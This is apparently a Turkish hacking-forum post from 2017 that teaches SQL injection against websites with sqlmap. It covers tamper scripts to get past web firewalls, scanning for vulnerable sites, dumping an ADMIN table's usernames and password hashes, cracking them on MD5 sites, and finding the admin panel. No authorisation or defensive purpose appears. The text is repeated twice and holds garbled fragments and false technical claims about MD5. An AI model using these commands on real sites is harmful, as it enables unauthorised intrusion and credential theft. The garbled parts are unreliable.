06-06-2017 Saat: 23:30
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. --dbs
bilindiği üzere --dbs databes verilerini çekmemize olanak sağlayan komuttur fakat tek başına herzaman işe yaramayabilir.
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. --dbms "MySql" -v 3 (4) --technique=BEUQ --tamper=)tamper script space2comment olabilir) --dbs
yukarda belirttiğim komutlar belirli güvenlik duvarı üzerinde etki gösterecektir peki ya bu komutlar nedir ne işe yarar??
technique:::teknik demektir U BEUQ iş görür
--cookie:: çerezdir login kısmındaki açıklarda daha hızlı veri çekilir olmazsa olmazdır login kısmı açıklarında
--threads::d.b verilerin daha hızlı çekilmesini sağlar
--tamper::: tamper en önemli olan işlevimizdir waf (güvenlik duvarı) bypass (aşmamız) etmemize yarar
cd/usr/share/sqlmap/tamper/ dan ulaşabilirsiniz.
--no-cast:kullanıcı bilgilerine dokunmadan geçmemize yarar bazen bu istenir genelde shutting down hatasında
--hex:::--no-cast ın tam tersi bilgilerdir
--random-agent , --user-agent ::: timed hatalarda işe yarar
PEKİ YA TAMPER NASIL SEÇİLİR???? EN ÖNEMLİ KONU İŞTE BU
tamper seçimimizi kali terminalinden wafw00f Linkleri görebilmek için Üye Olun veya Giriş Yapın.olarak öğrenebilir ona uygun tamper kodu seçilir ve bypass edilir bazı durumlarda wafw00f güvenlik duvarını tanımaz bu durumda özel tamperler lazım olacaktır scripte göre internetten indirilir cd/usr/share/sqlmap/tamper/ klasörüne yüklenir
değinmişken tam değineyim dedim sql açıkları nasıl bulunur
1:uniscan ile tarama yaparak
(uniscan -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -qweds)
2
afe3
3:acuntenix
belli başlı açık arama programlarıdır tabiki en doğru sonuç uniscan ile bulunur fakat uzun sürdüğü için açık olup olmadığı taramalar arası boş ise anlanır okadar beklenmez.
peki ya verileri çektik ulaştık databese işte ozaman
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -D databesismi --tables
---ADMİN---
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -D databesismi -T ADMİN --columns
SİFRE
KULLANICI_ADI
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -D databesismi -T ADMİN -C SİFRE,KULLANICI_ADI --dump
databes ismimiz şahsa ait olan isim olacaktır information schema her sql dili kullanan sitede mevcuttur işe yaramaz.
şifre geldi 486eqw4e65q123eq şeklinde işte bu MD5 formatında bir şifredir 128 bit şifrelenmiş hiç deneme beyninle kıramazsın kardeşim.google amcada MD5 crack sitelerinden dene olmazsa uzatma beceremezsin her hane başına 64 tane olasılık gelecektir.
tamam şifreyi aldım admin panelini bulamadım napabilirim??
admin paneli bazı betiklerle bulunur fakat bulunamaz ise sitenin en altında scriptler yazar şanslı gününde isen script hazır script ise onu araştır ordan bulacaksın.
bilindiği üzere --dbs databes verilerini çekmemize olanak sağlayan komuttur fakat tek başına herzaman işe yaramayabilir.
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. --dbms "MySql" -v 3 (4) --technique=BEUQ --tamper=)tamper script space2comment olabilir) --dbs
yukarda belirttiğim komutlar belirli güvenlik duvarı üzerinde etki gösterecektir peki ya bu komutlar nedir ne işe yarar??
technique:::teknik demektir U BEUQ iş görür
--cookie:: çerezdir login kısmındaki açıklarda daha hızlı veri çekilir olmazsa olmazdır login kısmı açıklarında
--threads::d.b verilerin daha hızlı çekilmesini sağlar
--tamper::: tamper en önemli olan işlevimizdir waf (güvenlik duvarı) bypass (aşmamız) etmemize yarar
cd/usr/share/sqlmap/tamper/ dan ulaşabilirsiniz.
--no-cast:kullanıcı bilgilerine dokunmadan geçmemize yarar bazen bu istenir genelde shutting down hatasında
--hex:::--no-cast ın tam tersi bilgilerdir
--random-agent , --user-agent ::: timed hatalarda işe yarar
PEKİ YA TAMPER NASIL SEÇİLİR???? EN ÖNEMLİ KONU İŞTE BU
tamper seçimimizi kali terminalinden wafw00f Linkleri görebilmek için Üye Olun veya Giriş Yapın.olarak öğrenebilir ona uygun tamper kodu seçilir ve bypass edilir bazı durumlarda wafw00f güvenlik duvarını tanımaz bu durumda özel tamperler lazım olacaktır scripte göre internetten indirilir cd/usr/share/sqlmap/tamper/ klasörüne yüklenir değinmişken tam değineyim dedim
sql açıkları nasıl bulunur1:uniscan ile tarama yaparak
(uniscan -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -qweds)
2
afe33:acuntenix
belli başlı açık arama programlarıdır tabiki en doğru sonuç uniscan ile bulunur fakat uzun sürdüğü için açık olup olmadığı taramalar arası boş ise anlanır okadar beklenmez.
peki ya verileri çektik ulaştık databese işte ozaman
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -D databesismi --tables
---ADMİN---
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -D databesismi -T ADMİN --columns
SİFRE
KULLANICI_ADI
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -D databesismi -T ADMİN -C SİFRE,KULLANICI_ADI --dump
databes ismimiz şahsa ait olan isim olacaktır information schema her sql dili kullanan sitede mevcuttur işe yaramaz.
şifre geldi 486eqw4e65q123eq şeklinde işte bu MD5 formatında bir şifredir 128 bit şifrelenmiş hiç deneme beyninle kıramazsın kardeşim.google amcada MD5 crack sitelerinden dene olmazsa uzatma beceremezsin her hane başına 64 tane olasılık gelecektir.
tamam şifreyi aldım admin panelini bulamadım napabilirim??
admin paneli bazı betiklerle bulunur fakat bulunamaz ise sitenin en altında scriptler yazar şanslı gününde isen script hazır script ise onu araştır ordan bulacaksın.